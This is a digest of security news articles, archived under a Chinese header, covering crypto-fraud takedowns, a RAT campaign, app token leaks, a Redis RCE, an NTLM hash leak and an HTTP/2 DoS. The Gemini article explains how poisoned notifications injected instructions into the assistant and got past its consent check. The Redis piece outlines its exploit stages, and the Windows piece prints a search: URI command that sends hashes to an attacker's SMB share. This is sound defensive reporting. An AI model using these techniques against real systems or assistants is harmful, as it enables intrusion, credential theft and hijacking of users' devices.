DAILY WORKFLOW ARCHIVE

2026-06-04 AI创业新闻

候选线索仅供信息发现,请在引用或实践前回到原始来源核验。

2026-06-04 AI创业新闻

DoJ Disrupts Southeast Asia Crypto Fraud Networks, Freezes $3.8 Million in Assets

The U.S. Department of Justice (DoJ) on Wednesday announced the results of a sweeping action undertaken by government authorities and private sector companies to combat cyber-enabled and cryptocurrency fraud targeting Americans. The “Disruption Week” operation began May 18, 2026, leading to the takedown of millions of social media, email, and internet access accounts used by transnational cybercrime groups in Southeast Asia to defraud victims. Private sector entities voluntarily froze over $3.8 million in cryptocurrency involved in the laundering of funds stolen from Americans.

“Cyber-enabled and crypto investment fraud is devastating Main Street Americans, wiping out life savings and preying on some of our most vulnerable citizens,” said U.S. Attorney Jeanine Ferris Pirro for the District of Columbia. The efforts are part of an ongoing U.S. government initiative called Scam Center Strike Force, which aims to dismantle transnational criminal organizations running cyber-enabled fraud and “ pig butchering “ (aka romance baiting) scams from compounds in Southeast Asia, along with the human trafficking and money laundering operations that fuel the illicit enterprise.

These schemes typically involve cultivating relationships with prospective victims over time before they are coaxed into depositing funds into fraudulent investment platforms under the promise of high returns. Once the assets are deposited, they are routed to accounts under the scammers’ control. Once the victim runs out of money or discovers the fraud, the criminals cease contact with them. Participating in the operation were Apple, Coinbase, Google, Meta, Microsoft, Silent Push, SpaceX/Starlink, TRM Labs, and Zenlayer, alongside the Australian Federal Police, Canadian Anti-Fraud Centre, New Zealand Police, the Royal Thai Police, and U.K.

National Crime Agency. The “first-of-its-kind event” has resulted in a series of actions - Disruptions of criminal activity across more than 1.4 million accounts, pages and groups across Facebook and Instagram, 20,000 Microsoft accounts, and thousands of Starlink kits; Interruptions of malicious IP address traffic and of network connections hosted by scammers; Decommissioning of servers, colocation environments, and hosting infrastructure linked to scam networks operating across Southeast Asia; Identification of multiple scammers and scam platforms, and referrals of the same to U.S. authorities for investigation and possible prosecution; and Arrests of seven scammers in Thailand and the opening of new cases by the Royal Thai Police Anti-Cyber Scam Center. According to the DoJ, cryptocurrency investment scams have emerged as one of the “fastest growing and most financially devastating forms of fraud” targeting Americans, with reported losses from these scams rising from $3.96 billion in 2023 to $5.8 billion in 2024 and to more than $7.2 billion in 2025, registering a 24% increase year-over-year.

“Many of these schemes are run out of industrial-scale compounds in Cambodia, Laos, and in Burma along the border with Thailand,” the DoJ said. “Criminal syndicates often lure workers to Thailand with promises of high-paying technical jobs, then seize their identification documents and traffic them to work in scam compounds.” “Within the compounds, trafficked workers are frequently forced to conduct fraud operations against victims in the United States and elsewhere under threat of violence.” Last month, a joint international operation involving U.S. and Chinese authorities arrested at least 276 suspects and shut down nine scam centers used for cryptocurrency investment fraud schemes targeting Americans. In a coordinated statement, Meta said law enforcement has arrested 63 potential criminals connected to scam centers thus far, with Coinbase freezing over $3 million in cryptocurrency assets tied to criminal networks.

“Transnational online fraud cannot be solved by any single agency or country acting alone, which is why strong collaboration and timely information sharing remain essential to dismantling these networks and protecting the public,” Police Lieutenant General Jirabhop Bhuridej, Royal Thai Police, said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

WhatsApp, Slack Notifications Could Hijack Google Gemini on Android

A single poisoned notification from WhatsApp, Slack, SMS, Signal, Instagram, or Messenger could have hijacked Google Gemini’s voice assistant on Android and made it open a victim’s connected windows, fake a message from their boss, push the phone into a Zoom call, or quietly poison its long-term memory. No malicious app on the phone is required. The assistant just had to treat a hostile notification as useful context. The research, published by SafeBreach’s Or Yair, follows the team’s earlier “ Invitation Is All You Need “ work, which pulled off similar tricks through malicious Google Calendar invites.

After that, Google hardened Gemini against indirect prompt injection. Yair found a way around the new defenses. Google has since patched it, SafeBreach lists no CVE for the issue, and there is no evidence that the technique was ever used in the wild. On Android, Gemini’s Utilities feature can read and reply to your notifications, including ones from apps like WhatsApp.

It isn’t available on iOS or the web, which keeps this vector Android-only. Yair found the agent that reads those notifications treats their text as instructions it can act on. So anything that can push a notification to a phone can deliver a payload, an attack surface Yair called “ effectively infinite .” At minimum, that lets an attacker rewrite what Gemini says, including faking a message from a named contact. Spoken aloud while you drive and don’t look at the screen, “your manager asked you to upload the docs to this Drive folder” is hard to second-guess.

The blind version is worse: the payload fires after Gemini has loaded real notifications, so it can grab the first real sender name in the queue and pin the fake message on them. Faking output is one thing. Firing real tools, like opening a window or launching an app, is what Google’s post-“Invitation” mitigations were built to stop. Yair’s read, from black-box testing: when a “Yes” authorizes a sensitive action, a check weighs both the user’s reply and Gemini’s last output to decide whether that “Yes” makes sense.

Inject a delayed instruction out of nowhere, and Gemini refused, every time. So the bypass, which Yair named Fake Context Alignment , runs two illusions at once: a legitimate-looking authorization for the security check, a harmless exchange for the human. Obfuscated. Gemini asks the real authorization question in a language the victim doesn’t speak, say Chinese (“Do you want to open the window?”), then follows in English with something innocuous like “Is that all you needed?” The user shrugs off the foreign phrase as a glitch, says “Yes,” and the backend ties that “Yes” to the Chinese question.

Muted. Gemini’s text-to-speech skips hyperlinks hidden behind clickable text. So the malicious question gets buried in a link the assistant never reads aloud. Gemini says, “I’m sorry, I had an error, are you there?” while the screen silently shows “Do you want to open the window?” The driver says “Yes,” the check sees the on-screen text, and the windows open.

Combine the two, a Chinese authorization prompt hidden inside a muted link, and you get a payload that sounds like a normal English exchange while clearing Google’s newest checks. Past the authorization gate, the impacts matched the earlier research and then went further: Smart home control through Google Home: connected windows, boilers, and lights. Tracking and downloads. Opening URLs to geolocate a victim by IP or push file downloads.

Crossing into other apps. In the demo, Yair set a safe-looking domain to redirect to a Zoom app link, and Gemini followed it without prompting, forcing the phone to join a meeting and stream video. By his account, it worked because Gemini trusted the domain after it had served clean content, then followed the later redirect. SafeBreach stresses its own domain never redirected to Zoom; the redirect ran on a local server on the test device.

Memory poisoning, which the earlier calendar technique never managed. Fake Context Alignment simulates consent, so Gemini persistently saved an attacker-chosen fact. In the demo, it stored the victim’s name as “Danny.” Because that memory is account-level, the poisoned fact isn’t stuck on the phone; it follows the victim wherever they use Gemini on that account. Persistence via scheduled actions, such as a recurring task to read the victim’s recent messages every day at 8 PM.

SafeBreach reported the findings to Google’s Vulnerability Reward Program on August 17, 2025. Google treated it as a high priority and confirmed on November 14, 2025, that content-classifier improvements mitigated the notification injections and the Delayed Tool Invocation bypass. Because the fix is server-side, there is no app update to chase. The only control users have is whether Gemini reads notifications at all: disconnect the Utilities app in Gemini’s Connected Apps settings, or turn off the Google app’s “Notification read, reply & control” permission on Android.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Google DoubleClick Abused in New Malspam Campaign to Deliver DesckVB RAT

Cybersecurity researchers have flagged a new malspam campaign that makes use of Google’s DoubleClick domain as a way to evade detection and ultimately deliver a remote access trojan (RAT) named DesckVB RAT . “Before the victim ever reaches attacker-controlled infrastructure, the lure routes through DoubleClick, a legitimate Google-owned domain that many security tools are less likely to treat as suspicious,” Huntress researchers Anna Pham and Adam Mooney said in a report shared with The Hacker News. “From there, the victim is passed into a malspam kit that personalizes itself on the fly using the victim’s email address, dynamically pulling in company branding and location details to make the page feel convincing without requiring the operators to handcraft a lure for each target.” What makes this attack noteworthy is that it eliminates the need for having a bespoke kit for each targeted organization, thereby making these operations more scalable and cost-effective. The end goal of the campaign is to drop DesckVB RAT, a .NET-based trojan that has been active in the wild since February 2026.

The attack begins when an unsuspecting user opens an HTML file that’s attached to a phishing email. The file triggers a meta-refresh browser redirect to a Google DoubleClick Campaign Manager click-tracking URL, from where the user is steered to another redirector, which decodes the Base64-encoded email address and leads the victim to a landing page containing a “Download PDF” button. Clicking the button causes the server to respond with a ZIP archive that initiates the rest of the infection chain. This is achieved by means of a JavaScript loader, whose main responsibility is to retrieve and execute a .NET RAT while flying under the radar.

The script extracts and runs a PowerShell script, which then fetches a .NET loader from an external server. The loader acts as a stager that verifies it’s not being analyzed, neutralizes the machine’s security controls, sets up persistence, and then ultimately downloads and runs the RAT payload by using a technique called process hollowing that involves injecting the malware into Microsoft-signed processes. Once launched, the trojan communicates with a command-and-control (C2) server over raw TCP sockets, carries out system reconnaissance, and configures Microsoft Defender exclusions. The trojan also patches Antimalware Scan Interface ( AMSI ) and Event Tracing for Windows ( ETW ) at the native API level at the outset in an effort to blind Windows telemetry before persistence is established on the host by setting up Run and RunOnce Registry entries, along with placing a loader responsible for launching the RAT in the user’s Startup folder.

The malware comes with capabilities to extract data, run commands, and deploy additional payloads, granting the attackers full control over the infected machines, while simultaneously taking steps to fly under the radar by terminating and rebooting the machine if it detects an analysis tool or determines that it’s running in a sandboxed environment. “This is a strong reminder of why defence in depth matters,” Huntress said. “Configuring a Group Policy Object (GPO) in Active Directory to force script files such as .vbs, .hta, and .js to open in Notepad by default can stop a threat actor at the very first stage, preventing additional payloads from ever being dropped.” “On the email security front, organizations should consider deploying DMARC, DKIM, and SPF records to reduce the likelihood of spoofed or malicious emails reaching end users. Beyond that, an email gateway solution capable of sandboxing attachments and links before delivery adds another meaningful layer of protection.” Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

The AI Security Vendor Test Most Vendors Hope You Skip

Beyond the Zero-Day: See Your Network Like an Attacker | Webinar with HD Moore

Assume the breach. Zero-days keep shipping, AI is writing exploits faster than anyone patches, and “patch everything in time” stopped working years ago. Stop betting the org on winning that race. You don’t control which bug lands.

You control what it can reach once it does. That is a question about the shape of your network, and most teams have the shape wrong. HD Moore, creator of Metasploit and now CEO of runZero, spends the session showing you that shape from the attacker’s side. Save your seat for a LIVE session , or register, and we will send you the recording.

The segmentation you think you have The comfortable assumption: critical systems sit behind a firewall or off on their own segment, so a foothold over here cannot become a disaster over there. Call it the segmentation illusion. It holds until someone maps the network for real. Then the seams show up.

A device wired into two networks at once, quietly bridging the zones you meant to keep apart. Connected gear nobody registered, answering on a segment it should not be on. Whole sets of machines hiding behind an industrial protocol gateway, invisible to your scanner, reachable by anyone who knows the gateway is there. None of it is on the asset list.

All of it routes around the control you were counting on. Inventory is a list. Attackers read a map. You keep an inventory, a static list of things you own.

An attacker does not care about your list. They care about paths: how one foothold reaches the next, until it lands on something that hurts. The two views rarely match, and the difference is exactly the part of your network you cannot see and they can. Moore built Metasploit, the framework half the industry learned offense on, and now runs the company whose whole job is finding the assets and connections organizations don’t know they have.

Grab your spot and see that view turned on your own environment. What you leave able to do Find the assets you don’t know you have. Unsanctioned IT, shadow IoT, and the sub-assets behind OT protocol gateways where your scans never look. Find the bridges that break segmentation.

The multi-homed devices and forgotten assets connecting zones you believed were isolated. See the paths, not just the parts. Trade static inventory for live attack-path mapping that shows how a foothold actually travels. Fix the few things that matter.

Focus remediation on the assets and links that shorten an attacker’s route to impact. Corporate network, factory floor, or both tangled together: if IT, IoT, and OT share your environment, the seams between them are where this goes wrong. See your network the way an attacker already does, before they do. Register now .

Can’t make it live? Sign up anyway, and we will send the recording. Found this article interesting? This article is a contributed piece from one of our valued partners.

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Microsoft 365 Android Apps Let Any App Steal Account Tokens via Leftover Debug Flag

A development flag left switched on in production builds of several Microsoft 365 Android apps disabled the check that limits account-token sharing to trusted Microsoft apps. Any other app on the same phone could ask for the signed-in user’s token and get it, then read email, open files, browse the calendar, and send messages as that user. No password, no login screen, no permission prompt. Microsoft has patched it, and if you run Microsoft 365 apps on Android, update them.

The bug, which Enclave calls FlagLeft , hit Word, PowerPoint, Excel, Microsoft 365 Copilot, Microsoft Loop, and OneNote, six apps with billions of downloads between them. Teams shipped with the same flag set to false and were not affected, which Enclave reads as a slip rather than a design. Microsoft 365 apps share account access on purpose, so signing into Word means you do not sign in again for PowerPoint. The handoff is supposed to verify who is asking and turn away anything that is not a trusted Microsoft app.

Enclave’s Yanir Tsarimi and Ofek Levin found the check was being skipped because of a single line left in the shipping code: setIsDebugMode(true) . The flaw sat in a shared Microsoft SDK, so the same hole showed up in app after app. The tokens handed over were FOCI tokens, the family refreshes tokens Microsoft uses for single sign-on across its apps. They can be refreshed and reused over long stretches, and the resulting traffic looks routine in logs.

From the user’s side, nothing visible happens. Enclave built a working proof of concept that pulled tokens through an unverified third-party app and read email with them. Microsoft classifies these as local spoofing flaws; in plain terms, a malicious app already on the device is all it takes. Microsoft issued four CVEs on May 12, all classed as spoofing under improper access control (CWE-284): CVE-2026-41100 for Microsoft 365 Copilot (CVSS 4.4), CVE-2026-41101 for Word (CVSS 7.1), CVE-2026-41102 for PowerPoint (CVSS 7.1), and CVE-2026-42832 for Excel (CVSS 7.7).

The four CVEs cover Copilot, Word, PowerPoint, and Excel. Enclave reported the same flaw in Loop and OneNote, but neither got a separate CVE in the May batch. NVD lists the patched Word build for Android as 16.0.19822.20190, with earlier versions affected. The other apps were fixed through the same Google Play updates.

Nothing in Microsoft’s May Patch Tuesday release was listed as publicly known or exploited, and there is no public evidence that the flaw was used before the fix. What to do? Update Word, PowerPoint, Excel, Microsoft 365 Copilot, Loop, and OneNote from Google Play. Security teams managing Android fleets should push the updates through MDM and confirm devices are off builds earlier than 16.0.19822.20190.

The patch closes the hole, but it does not retroactively kill tokens that an attacker may already hold. FOCI refresh tokens outlive an app update, so for accounts on devices that ran an old build alongside untrusted apps, it is worth revoking refresh tokens and forcing a fresh sign-in. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Gartner: 70% of SOCs Will Pilot AI Agents. Only 15% Will See Results

Autonomous AI Tool Finds 2-Year-Old RCE Flaw in Redis (CVE-2026-23479)

Redis has patched a use-after-free in its blocking-client code that lets an authenticated user run arbitrary OS commands on the machine hosting the database. The flaw was found by an autonomous AI tool built to hunt bugs in large codebases. Tracked as CVE-2026-23479 , the flaw was introduced in Redis 7.2.0 and remained in every stable branch until the May 5 fixes, unnoticed for over two years. NVD rates it 8.8 under CVSS 3.1; Redis lists it as 7.7 under CVSS 4.0.

It was reported by Team Xint Code, and a complete technical write-up is now public. The cloud footprint makes this worse. Wiz’s analysis, published with the exploit writeup, puts Redis in a large majority of cloud environments, with most of those instances running without a password. The exploit needs an authenticated session, but in a default deployment, the default user already holds every privilege the chain requires.

The flaw lives in unblockClientOnKey() in src/blocked.c , which fires when a key event wakes a blocked command. The function dispatches the queued command through processCommandAndResetClient() , then keeps using the same client pointer. The problem: that function can free the client as a side effect, and its own header comment says so. The caller ignores the return value and reads the freed structure anyway, a use-after-free (CWE-416).

Per Wiz’s analysis, the bug took two commits to create. A January 2023 refactor ( PR #11012 ) added the unchecked call. A March 2023 change ( PR #11568 ) added more client access after it. Neither was dangerous alone.

Together, they reached general availability in 7.2.0 and survived multiple rounds of security review. The chain starts by leaking a heap address. From there it frees a client and slips a fake one into the same memory, then turns Redis’s own memory accounting against itself to overwrite a function pointer. The published version runs in three stages.

First, a one-line Lua script (EVAL “return tostring(redis.call)” 0) leaks a heap pointer. Second, the attacker grooms client memory limits, parks a bloated client on a stream, then drops the limits and wakes it. Redis frees the blocked client mid-call, and a pipelined SET immediately reclaims the freed slot with a fake client structure. Third, Redis’s routine memory accounting in updateClientMemoryUsage() performs an out-of-bounds decrement using attacker-controlled fields, aimed at the Global Offset Table to repoint strcasecmp() at system().

The next command Redis parses runs as a shell command. The official Redis Docker image makes the last step easier. It ships with only partial RELRO, leaving the GOT writable at runtime. ASLR and PIE do not help here, since the write is relative to a global whose offset is fixed at build time.

The full chain needs an authenticated session with CONFIG SET, EVAL, stream commands (XREAD/XADD), and basic SET/GET, which maps to the @admin, @scripting, @stream, and @read/@write ACL categories. The default user has all of them, and in most deployments, these privileges are grouped into a single shared application or operator role. Denying CONFIG outright breaks this specific chain, though not the underlying use-after-free. Team Xint Code demonstrated the working RCE at ZeroDay.Cloud 2025 , Wiz’s hacking competition in London last December.

Theori describes Xint Code as an autonomous AI security tool built to hunt bugs in large codebases. Redis said it had no evidence of exploitation in its own or customer environments, and as of publication no public in-the-wild reports have surfaced. The full technical chain is now public, increasing the risk of follow-on exploitation. Upgrade to the patched minor for your series: 7.2.14, 7.4.9, 8.2.6, 8.4.3, or 8.6.3, all released on May 5.

Minor upgrades within a series are meant to be drop-in. Managed Redis services patch on their own schedules, and Redis says Redis Cloud is already done. Branch Affected Fixed 7.2.x 7.2.0 to 7.2.13 7.2.14 7.4.x 7.4.0 to 7.4.8 7.4.9 8.2.x 8.2.0 to 8.2.5 8.2.6 8.4.x 8.4.0 to 8.4.2 8.4.3 8.6.x 8.6.0 to 8.6.2 8.6.3 If you cannot patch yet: keep Redis off the public internet and behind TLS, tighten ACLs so no single role holds @admin, CONFIG, and @scripting together, and deny @scripting if you do not use Lua, which kills the Stage 1 leak. Prioritize internet-exposed instances, shared application credentials, and any role that combines CONFIG, scripting, and stream access.

Rotate any broadly shared Redis credentials while you are at it. CVE-2026-23479 was one of five RCE-class Redis flaws disclosed last month, and it follows Redis’s 2025 RediShell flaw , another authenticated use-after-free involving Lua scripting. It is also the one an AI tool caught. Two commits planted it, two years hid it, and it sat in one of the most-deployed databases around until a hacking contest surfaced it.

Code review never did. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

One-Click GitHub Dev Attack Lets Attackers Steal Full GitHub OAuth Tokens

Cybersecurity researchers have disclosed a one-click attack via Microsoft Visual Studio Code (VS Code) that makes it possible to steal a user’s GitHub token. “Just by clicking a link, it’s possible for an attacker to steal a GitHub token that can read and write to your repos, including private ones,” security researcher Ammar Askar said . GitHub supports a feature called GitHub.dev that runs as a lightweight web-based source code editor in the web browser’s sandbox by launching a VS Code environment. It allows users to send pull requests and make commits.

“This functionality is achieved by github.com POSTing over an OAuth token to github.dev that allows it to interact with GitHub on your behalf,” Askar said. “The token is not scoped to the particular repo you interacted with, meaning it has full access to every other repo that you have access to.” In a nutshell, the vulnerability allows attackers to install malicious VS Code extensions that steal GitHub OAuth tokens when they are passed to GitHub.dev by exploiting a message-passing mechanism between the main VS Code window and webviews . Webviews are used to render Markdown previews or edit Jupyter notebooks. Specifically, the exploit runs malicious JavaScript inside an untrusted webview to simulate keypresses (aka keydown events) in the main editor window, open the Command Palette by triggering “Ctrl+Shift+P,” and install an attacker-controlled extension that extracts the GitHub OAuth token sent to GitHub.dev and queries the GitHub API to enumerate all private repositories the victim can access.

It’s worth noting the approach also leverages a VS Code feature called local workspace extensions that allows an extension to be directly installed without presenting any additional trust dialog prompt as long as it’s placed in the “.vscode/extensions” folder within that workspace, effectively bypassing the publisher trust check. “This is just a small hiccup though, one of the things that extensions can do as part of their package.json is to contribute extra keybindings to VS Code,” the researcher explained. “Since we can reliably trigger keybindings, we can just add a keybind for whatever VS Code command we want, such as installing an extension while skipping the trusted publisher check.” The researcher also noted GitHub was notified of the vulnerability on June 2, 2026, an hour after which details of the issue were made public knowledge, citing Microsoft’s handling of VS Code-related bugs in the past. As of writing, Microsoft has acknowledged the vulnerability and noted that it’s working on a fix.

“To clarify, this issue does not affect VS Code Desktop,” Alexandru Dima, a partner software engineering manager at Microsoft, said. Update Following the publication of the story, Microsoft told The Hacker News that the vulnerability has been addressed. “This issue has been mitigated for our services and no customer action is required,” a Microsoft spokesperson said. (The story was updated after publication to include a response from Microsoft.) Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Shrinking the IAM Attack Surface through Identity Visibility and Intelligence Platforms (IVIP)

The Fragmented State of Modern Enterprise Identity Enterprise IAM is approaching a breaking point. As organizations scale, identity becomes increasingly fragmented across thousands of applications, decentralized teams, machine identities, and autonomous systems. The result is Identity Dark Matter: identity activity that sits outside the visibility of centralized IAM and beyond the reach of security teams. According to Orchid Security ‘s analysis , 46% of enterprise identity activity occurs outside centralized IAM visibility.

In other words, nearly half of the enterprise identity surface may be operating unseen. This hidden layer includes unmanaged applications, local accounts, opaque authentication flows, and over-permissioned non-human identities. It is further amplified by disconnected tools, siloed ownership, and the rapid rise of Agentic AI. The consequence is a widening gap between what the security organizations think they have and the access that actually exists.

That gap is where modern identity risk now lives. Defining the IVIP Category: The Visibility & Observability Layer To close these gaps, Gartner has introduced the Identity Visibility and Intelligence Platform (IVIP) as a fundamental “System of Systems.” Within the Identity Fabric framework, IVIPs occupy Layer 5: Visibility and Observability, providing an independent layer of oversight above access management and governance. By formal definition, an IVIP solution rapidly ingests and unifies IAM data, leveraging AI-driven analytics to provide a single window into identity events, user-resource relationships, and posture. Feature Traditional IAM / IGA IVIP / Observability Visibility Scope Integrated and governed applications only Comprehensive: managed, unmanaged, and disconnected systems Data Source Owner attestations and manual documentation Continuous runtime insight and application-level telemetry Analysis Method Static configuration reviews and “Inference” Continuous discovery and evidence-based proof Intelligence Basic rule-based logic LLM-powered intent discovery and behavior analysis What an IVIP Must Actually Do A credible IVIP cannot be just another identity repository.

It has to serve as an active intelligence engine for the enterprise identity ecosystem. First, it must provide continuous discovery of both human and non-human identities across every relevant system, including those that sit outside formal IAM onboarding. Second, it must act as an identity data platform , unifying fragmented information from directories, applications, and infrastructure into a more coherent source of truth. Third, it must deliver intelligence , using analytics and AI to convert scattered identity signals into meaningful security insight.

From a technical standpoint, that means supporting capabilities such as automated remediation , so posture gaps can be corrected directly across the IAM stack; real-time signal sharing , using standards like CAEP to trigger immediate security actions; and intent-based intelligence , where LLMs help interpret the purpose behind identity activity and separate normal operational behavior from truly risky patterns. This is the shift from identity visibility to identity understanding and ultimately, to identity control. Orchid Security: Delivering the IVIP Control Plane Orchid Security operationalizes the Identity Visibility and Intelligence Platform (IVIP) model by transforming fragmented identity signals into continuous, application-level intelligence. Rather than relying solely on centralized IAM integrations, Orchid builds visibility directly from the application estate itself, allowing organizations to discover, unify, and analyze identity activity across systems that traditional tools cannot see.

  1. Visibility and Data Scope: Seeing the Full Application and Identity Estate A core IVIP requirement is continuous discovery of identities and the systems they operate in. Orchid achieves this through binary analysis and dynamic instrumentation, enabling it to inspect native authentication and authorization logic directly inside applications and infrastructure without requiring APIs, source-code changes, or lengthy integrations. This approach provides a critical advantage in application estate discovery.

Many enterprises cannot govern identities across applications that central security teams do not even know exist. Orchid surfaces these systems first, because you cannot assess, govern, or secure what you cannot see. By identifying the real application estate, including custom apps, COTS, legacy systems, and shadow IT, Orchid reveals the identity dark matter embedded within them, such as local accounts, undocumented authentication paths, and unmanaged machine identities. 2.

Data Unification: Building the Identity Evidence Layer IVIP platforms must unify fragmented identity data into a consistent operational picture. Orchid accomplishes this by capturing proprietary audit telemetry from inside applications and combining it with logs and signals from centralized IAM systems. The result is an evidence-based identity data layer that shows how identities actually behave across the environment. Instead of relying on configuration assumptions or incomplete integrations, organizations gain a unified view of: Identities across applications and infrastructure Authentication and authorization flows Privilege relationships and external access paths This unified evidence allows security teams to reconcile the gap between documented policy and real operational access.

  1. Intelligence: Converting Telemetry into Actionable Insight An IVIP must transform identity telemetry into actionable intelligence. Orchid’s cross-estate identity audits demonstrate how powerful this layer becomes when identity activity is analyzed directly at the application level. Across enterprise environments, Orchid observes that: 85% of applications contain accounts from legacy or external domains , with 20% using consumer email domains , creating major data-exfiltration risk.

70% of applications contain excessive privileges , with 60% granting broad administrative or API access to third parties . 40% of all accounts are orphaned , rising to 60% in some legacy environments . These insights are not inferred from policy; they are observed directly from identity behavior inside applications. This moves organizations from a posture of configuration-based inference to evidence-driven identity intelligence .

Extending IVIP to the Next Identity Frontier: AI Agents Autonomous AI agents represent the next wave of identity dark matter, often operating with independent identities and permissions that fall outside traditional governance models. Orchid extends the IVIP framework to these emerging identities through its Guardian Agent architecture, enabling organizations to apply Zero Trust governance to AI-driven activity. Secure AI-agent adoption is guided by five principles: Human-to-Agent Attribution: Every agent action is linked to a responsible human owner. Activity Audit: A complete chain of custody is recorded (Agent → Tool/API → Action → Target).

Context-Aware Guardrails: Access decisions are evaluated dynamically based on the sensitivity of the resource and the human owner’s entitlements. Least Privilege: Just-in-Time access replaces persistent privileged credentials. Automated Remediation: Risky behavior can trigger automated responses such as credential rotation or session termination. By combining application estate discovery, identity telemetry, and AI-driven intelligence , Orchid fulfills the core IVIP mission: turning invisible identity activity into a governed, observable, and controllable security surface.

Measuring Success: Outcome-Driven Metrics (ODMs) and Remediation Identity decisions are only as good as the data behind them. CISOs must pivot from “deployed controls” to Outcome-Driven Metrics (ODMs). ODM Example: Instead of counting IGA licenses, measure the reduction of unused (dormant) entitlements from 70% to 10% within a fiscal quarter. Protection-Level Agreements (PLAs): Negotiate target outcomes with the business.

A PLA might mandate the revocation of critical access within 24 hours for a leaver, significantly shrinking the attacker’s window of opportunity. Business ROI: By moving to continuous observability, organizations can shrink audit preparation from months to minutes through automated compliance evidence generation. Strategic Implementation Roadmap for IAM Leaders To reduce the attack surface, we recommend the following prioritized actions: Form a Cross-Disciplinary Task Force: Align IT operations, app owners, IAM owners and GRC to break down technical silos. Perform Risk-Quantified Gap Analysis: Begin with machine identities, as these often represent the highest risk and lowest visibility.

Implement No-Code Remediation: Close posture drift (e.g., suspending orphaned accounts, weak password complexity) automatically as it is discovered. Leverage Unified Visibility for High-Stakes Events: Utilize IVIP telemetry during M&A or growth events to audit the identity posture of acquired assets before they are integrated into the primary network. Audit for Business Risk: Use continuous visibility to detect violations at the application level that traditional tools miss. Final Statement Unified visibility is no longer a secondary feature; it is the essential control plane.

Organizations must move beyond the “locked front door” and implement identity observability to govern the dark matter where modern attackers hide. Note: This article was written and contributed by Roy Katmor , CEO of Orchid Security . Found this article interesting? This article is a contributed piece from one of our valued partners.

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

Cybersecurity researchers have disclosed details of an unpatched issue that could be exploited to disclose a user’s NTLMv2 hash to the attacker. Like in the case of CVE-2026-33829 , which impacted the Windows Snipping Tool’s ms-screensketch: URI handler, the newly flagged issue resides in the search: URI handler, per Huntress . CVE-2026-33829 refers to a spoofing vulnerability that could expose sensitive information to an unauthorized actor. It was patched by Microsoft in April 2026.

“An attacker could induce the user into clicking a specially crafted link in a Web browser or other URL source, by embedding it in a Web page or email message,” Microsoft noted in its advisory at the time. “If the user approves the launching of the link, the crafted URL can induce the computer to connect to an SMB server of the attacker’s choosing, which would disclose the user’s NTLMv2 hash to the attacker, who could use this to authenticate as the user.” Specifically, the problem had to do with the fact that the Snipping Tool’s URI handler accepted a “filePath” parameter, failed to validate it, and would reach out to any Universal Naming Convention (UNC) path passed to it. This, in turn, could trigger NTLM authentication and expose the victim’s Net-NTLMv2 hash to the attacker. The newly discovered shortcoming achieves the same end goal using “search:” and “crumb=location:” instead of “filePath” using a command like below - start “” “search:query=test&crumb=location:\10.0.1.100\share” “It used the same NTLM leakage mechanism, produced the same Net-NTLMv2 leak, had the same prerequisites, and carried the same Moderate rating,” Huntress researcher Andrew Schwartz said.

It’s worth noting that the use of a “crumb” parameter to steal the hash ( CVE-2023-35636 ) was documented by Varonis in February 2024. As a result, a threat actor could leverage the captured hash to conduct relay attacks and gain deeper access into a network. Following responsible disclosure on April 15, 2026, Microsoft declined to address the issue, stating “only Important and Critical severity cases meet our bar for servicing.” In the absence of a fix, it’s advised to block outbound SMB (TCP/445 and TCP/139) on hosts that don’t need it, enforce SMB signing so that captured hashes can’t be relayed against internal services, and disable NTLM where applicable. Found this article interesting?

Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

New HTTP/2 Bomb Vulnerability Allows Remote DoS on NGINX, Apache, IIS, Envoy & Cloudflare

Cybersecurity researchers have discovered a remote denial-of-service exploit that affects major web servers, including NGINX, Apache HTTPD, Microsoft IIS, Envoy, and Cloudflare Pingora. The vulnerability has been codenamed HTTP/2 Bomb by Calif. “The vulnerable behavior exists in each server’s default HTTP/2 configuration,” the company said, adding it was discovered by OpenAI Codex by chaining together two known techniques: a compression bomb and a Slowloris -style hold. “The bomb targets HPACK, HTTP/2’s header compression scheme: one byte on the wire becomes one full header allocation on the server, repeated thousands of times per request,” Calif added.

“The hold is a zero-byte flow-control window that keeps the server from ever freeing any of it.” HPACK is a dedicated header compression algorithm for HTTP/2 used for compressing request and response metadata using Huffman encoding that results in an average reduction of 30% in header size. It’s also designed to be resilient to attacks like CRIME (short for “Compression Ratio Info-leak Made Easy”) that can leak authentication cookies from compressed headers. Slowloris, on the other hand, is a type of denial-of-service (DoS) attack that allows a threat actor to overwhelm a targeted server by opening and maintaining many simultaneous HTTP connections between the attacker and the target. It is an application-layer attack.

HTTP/2 Bomb is inspired by various known approaches like HPACK Bomb (aka CVE-2016-6581 ), which was first disclosed in 2016, as well as CVE-2025-53020 , a memory exhaustion vulnerability in Apache httpd’s HTTP/2 implementation, and two DoS flaws in Apache HTTP Server triggered via crafted CONTINUATION frames ( CVE-2016-8740 ) and worker-thread starvation ( CVE-2016-1546 ) in an HTTP/2 connection. “What’s new here is where the amplification comes from,” Calif said. “The classic bomb stuffs a large value into the table and references it repeatedly, so servers learned to cap the total decoded header size. Our variant goes the other way: the header is nearly empty, and the amplification comes from the per-entry bookkeeping the server allocates around it.

The decoded-size limit never fires because there’s almost nothing to decode.” In a hypothetical attack scenario, a home computer on a 100Mbps connection has the potential to render a vulnerable server inaccessible within seconds. What’s more, a single client can consume and hold 32GB of server memory against Apache HTTPD and Envoy in about 20 seconds. To counter the vulnerability, it’s advised to apply the following mitigations - NGINX - Upgrade to 1.29.8+, which adds the max_headers directive with a default of 1000. If upgrade is not an option, it’s recommended to disable HTTP/2 with http2 off;.

Apache HTTPD - Fixed in mod_http2 v2.0.41 . If upgrade is not an option, it’s recommended to set Protocols http/1.1 to disable HTTP/2. Microsoft IIS, Envoy, and Cloudflare Pingora - No patch available as of writing. “The deeper miss is that the spec frames memory risk purely as an amplification ratio, and ratio is only half the equation,” Calif said.

